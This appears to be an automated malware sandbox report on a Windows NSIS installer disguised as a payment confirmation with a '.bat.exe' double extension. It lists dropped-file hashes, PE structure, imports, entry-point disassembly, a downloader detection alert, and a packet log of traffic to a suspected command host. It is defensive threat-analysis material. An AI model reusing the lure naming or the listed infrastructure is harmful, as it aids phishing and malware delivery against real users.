                                                          Joe Sandbox View:
                                                          • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                          • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                          • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                          • Filename: 2T10XBqS6g.exe, Detection: malicious, Browse
                                                          • Filename: ZAMOWIEN.BAT.exe, Detection: malicious, Browse
                                                          • Filename: , Detection: malicious, Browse
                                                          • Filename: RFQ_BDS636011.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
                                                          Category:dropped
                                                          Size (bytes):267655
                                                          Entropy (8bit):1.2559804952290619
                                                          Encrypted:false
                                                          SSDEEP:768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
                                                          MD5:F6A4342C9271CFFEF29695EEA330941E
                                                          SHA1:291ABCFA507BA730832511E5F47EAA2CB4DFABBD
                                                          SHA-256:605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
                                                          SHA-512:D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
                                                          Malicious:false
                                                          Preview:...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):114454
                                                          Entropy (8bit):1.2519787240577294
                                                          Encrypted:false
                                                          SSDEEP:768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
                                                          MD5:F85E20AA1A28EEFFC89F744F6B6B67B3
                                                          SHA1:B61AEF131017C5605647983CE2D55769914BB104
                                                          SHA-256:C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
                                                          SHA-512:EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
                                                          Malicious:false
                                                          Preview:...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):310550
                                                          Entropy (8bit):1.2527719188567612
                                                          Encrypted:false
                                                          SSDEEP:1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
                                                          MD5:72FA348549D0BD9CE66E5F3EBA54DF3A
                                                          SHA1:D5B4797D07374226CD8173964DF8753F4ABB9E6E
                                                          SHA-256:7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
                                                          SHA-512:D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
                                                          Malicious:false
                                                          Preview:...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................|....................................r.............................W.............................................X.....................................................q.................
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):83152
                                                          Entropy (8bit):4.590487128538397
                                                          Encrypted:false
                                                          SSDEEP:1536:mPpv9Hyk6GJxFF88oQTFd5xzmxgxAVH3r2gnnAOpuIg:mPpvdys0xQT/5m9SJEuIg
                                                          MD5:3B9A97DDA581FFCEB29B192F228D66DF
                                                          SHA1:A11D7ADCC7A283B75D217A27724324F53FB91540
                                                          SHA-256:F783B047374C53913141CAFDE79B94B7C0D3AEA69AE86EA4417D7C8EB7798529
                                                          SHA-512:13BD775B3FF31F2127C28D26942DE8235EFE96AF4E2A921DBD82C813B53167E7B3E331A7F45178A77E65C2EF9CDA0D25DEAD6C775FFEC0F0E8CAD45DCB0DDF7E
                                                          Malicious:false
                                                          Preview:..UU...........K....]]]]]...FF...6.........g....++.....D.....;.s.:..//..d..O....AAA....=._...........;;;..........W............................888.......L.....CCC...............66..../..........vvv.........q..................C....<<<..................e..............-......qq..*.D.......00...%....""".======.#........................................'.........C.........UU..............L...^.......+............222.333.kkk.MMMMMMMMMM....................Q............ll.........hh.........ss.......>.........E......%%%..........................MM.................................... ...........:...........................Y.................[................................ ...........55555......<<<<.?.........//....D.Y.$$.............I..%.....................-..zz..sss.......=.........333.................KK.........JJ...................R...'.....................X..9....XXXXXXXXX.Z.......S...S......I...77.............eeeee....w...................................................v..gg.....222.
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):295959
                                                          Entropy (8bit):7.608537202687179
                                                          Encrypted:false
                                                          SSDEEP:6144:WH4o5aBQ0lz5DJimagdvhT7lmfp8Fpzkc1PlKQl4ZPIxo4+V6GVS2paf:WYo2Z5DAmaghhFm2YqtP4lIxgBVLpaf
                                                          MD5:5B2D5C7C1482936796C2699166B34424
                                                          SHA1:493E890B6548A54DDADB5D450797BBE68429502C
                                                          SHA-256:A7C9A3BE29FACF27782B90B0E6EE7D6B645CD7F827C6475BFD19A6480D0890EA
                                                          SHA-512:3983BFC12B10AB6C26BF3D070CAA9960C6F6DF07D48BB27318C984BD2CA56CF310050E0ED40A8E11E284B70413B01773DF7F5178216953AF5A5E47E4F7A89368
                                                          Malicious:false
                                                          Preview:.#............H.......................xxx.$............@..W.......dd..............................dddd...MM.........qq...........u.....PP...............A.............!!!.```.....BBBBBBB.999..........+......................X.n.....11.g........W.........y.....fff....-.........,..<<<....s........EEE........................AAA...w.CCC.......j.......^.!.w...ZZZZZZ....................................._.....___.............@@..........................ww...uuuuuu.C..............f...22..........E.:...........4..-......e.........ww...<<<<. ...........................B..f.....TT.7777..............www.....T.cc..xx.`....f..33...I...<<<<....tttt........Q...J.......................000..&.TT......==......A........jjj..M.ss........BBB.....DD.~~.........LLLLL.C.,..........r..........EE......................;........gg.....????..M.*.............==.....b..............J................................cc.............Y.U....E.....yyy.. ....AA..C......=....qqqqqq..............K.llll......bbb...@.?..........
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):7.712228071105721
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File size:550'217 bytes
                                                          MD5:25eec63edf7c0eb8628a89712b5cb363
                                                          SHA1:4e8d586a950492c30147b7d56bcfad49cd577966
                                                          SHA256:e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
                                                          SHA512:086feb119e2a02f2fd7afc45c422f9b472f049eb2e79f83769f25254d88a84086275d2cff1e891d360ea57978292cd0caf958e4000cd659ac532165e1f881dfb
                                                          SSDEEP:6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
                                                          TLSH:D9C4F1E4E210C1A7E25F5D38DAB169F11D80BC38D1E1087B43507EA9F4B2A2599EF91F
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                          Icon Hash:4571753721719a8d
                                                          Entrypoint:0x403645
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                          Instruction
                                                          sub esp, 000003F8h
                                                          push ebp
                                                          push esi
                                                          push edi
                                                          push 00000020h
                                                          pop edi
                                                          xor ebp, ebp
                                                          push 00008001h
                                                          mov dword ptr [esp+20h], ebp
                                                          mov dword ptr [esp+18h], 0040A230h
                                                          mov dword ptr [esp+14h], ebp
                                                          call dword ptr [004080A0h]
                                                          mov esi, dword ptr [004080A4h]
                                                          lea eax, dword ptr [esp+34h]
                                                          push eax
                                                          mov dword ptr [esp+4Ch], ebp
                                                          mov dword ptr [esp+0000014Ch], ebp
                                                          mov dword ptr [esp+00000150h], ebp
                                                          mov dword ptr [esp+38h], 0000011Ch
                                                          call esi
                                                          test eax, eax
                                                          jne 00007FA50493272Ah
                                                          lea eax, dword ptr [esp+34h]
                                                          mov dword ptr [esp+34h], 00000114h
                                                          push eax
                                                          call esi
                                                          mov ax, word ptr [esp+48h]
                                                          mov ecx, dword ptr [esp+62h]
                                                          sub ax, 00000053h
                                                          add ecx, FFFFFFD0h
                                                          neg ax
                                                          sbb eax, eax
                                                          mov byte ptr [esp+0000014Eh], 00000004h
                                                          not eax
                                                          and eax, ecx
                                                          mov word ptr [esp+00000148h], ax
                                                          cmp dword ptr [esp+38h], 0Ah
                                                          jnc 00007FA5049326F8h
                                                          and word ptr [esp+42h], 0000h
                                                          mov eax, dword ptr [esp+40h]
                                                          movzx ecx, byte ptr [esp+3Ch]
                                                          mov dword ptr [00429B18h], eax
                                                          xor eax, eax
                                                          mov ah, byte ptr [esp+38h]
                                                          movzx eax, ax
                                                          or eax, ecx
                                                          xor ecx, ecx
                                                          mov ch, byte ptr [esp+00000148h]
                                                          movzx ecx, cx
                                                          shl eax, 10h
                                                          or eax, ecx
                                                          movzx ecx, byte ptr [esp+0000004Eh]
                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x18858.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x66b70x6800e65344ac983813901119e185754ec24eFalse0.6607196514423077data6.4378696011937135IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xa0000x1fb780x600caa377d001cfc3215a3edff6d7702132False0.5091145833333334data4.126209888385862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x4a0000x188580x18a0073bbe3fdd1585fbd610b24874590b455False0.22416322969543148data5.2980000367452575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x4a4180x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.14908908079971608
                                                          RT_ICON0x5ac400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.27520746887966807
                                                          RT_ICON0x5d1e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.3553001876172608
                                                          RT_ICON0x5e2900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.48667377398720685
                                                          RT_ICON0x5f1380x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.43934426229508194
                                                          RT_ICON0x5fac00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.569043321299639
                                                          RT_ICON0x603680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States0.5552995391705069
                                                          RT_ICON0x60a300x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.18841463414634146
                                                          RT_ICON0x610980x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4869942196531792
                                                          RT_ICON0x616000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.598404255319149
                                                          RT_ICON0x61a680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.26344086021505375
                                                          RT_ICON0x61d500x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 384EnglishUnited States0.3094262295081967
                                                          RT_ICON0x61f380x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.42905405405405406
                                                          RT_DIALOG0x620600x100dataEnglishUnited States0.5234375
                                                          RT_DIALOG0x621600x11cdataEnglishUnited States0.6056338028169014
                                                          RT_DIALOG0x622800x60dataEnglishUnited States0.7291666666666666
                                                          RT_GROUP_ICON0x622e00xbcdataEnglishUnited States0.601063829787234
                                                          RT_VERSION0x623a00x174dataEnglishUnited States0.5860215053763441
                                                          RT_MANIFEST0x625180x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                          DLLImport
                                                          ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                          SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                          ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                          COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                          USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                          GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                          KERNEL32.dllRemoveDirectoryW, lstrcmpiA, GetTempFileNameW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, WriteFile, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, CopyFileW
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-14T16:35:30.624887+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549977109.99.162.14443TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 14, 2025 16:35:29.082701921 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:29.082755089 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:29.082838058 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:29.097731113 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:29.097747087 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.028521061 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.029311895 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.394810915 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.394834995 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.395183086 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.395240068 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.398261070 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.439338923 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.624680996 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.624708891 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.624742031 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.624756098 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.624788046 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.624830008 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.743830919 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.743912935 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.744188070 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.744251966 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.745202065 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.745260000 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.746368885 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.746428013 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.863898039 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.863955021 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.863980055 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.863996983 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.864016056 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.864032984 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.864432096 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.864489079 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.865168095 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.865225077 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.865853071 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.865916967 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.866655111 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.866712093 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.867532015 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.867583990 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.983086109 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.983172894 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.983381033 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.983441114 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.983911991 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.983978987 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.984388113 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.984446049 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.984643936 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.984704971 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.985331059 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.985392094 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.985595942 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.985651970 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.985804081 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.985857964 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.986104965 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.986160994 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.986377954 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.986433029 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.987030029 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.987081051 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.987189054 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.987245083 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:30.987410069 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:30.987462044 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.073672056 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.073710918 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.073812962 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.073844910 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.073863029 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.077451944 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.102762938 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.102858067 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.103154898 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.103337049 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.103419065 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.103481054 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.103693962 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.103749037 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.103908062 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.103966951 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.104160070 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.104221106 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.104497910 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.104547977 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.108004093 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.108066082 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.108272076 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.108326912 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.108485937 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.108573914 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.111912966 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.111974001 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.112112045 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.112170935 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.112431049 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.112489939 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.112723112 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.112776995 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.112958908 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.113010883 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.164304018 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.164426088 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.164519072 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.164577007 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.193253994 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.193296909 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.193350077 CET49977443192.168.2.5109.99.162.14
                                                          Jan 14, 2025 16:35:31.193386078 CET44349977109.99.162.14192.168.2.5
                                                          Jan 14, 2025 16:35:31.193404913 CET49977443192.168.2.5109.99.162.14
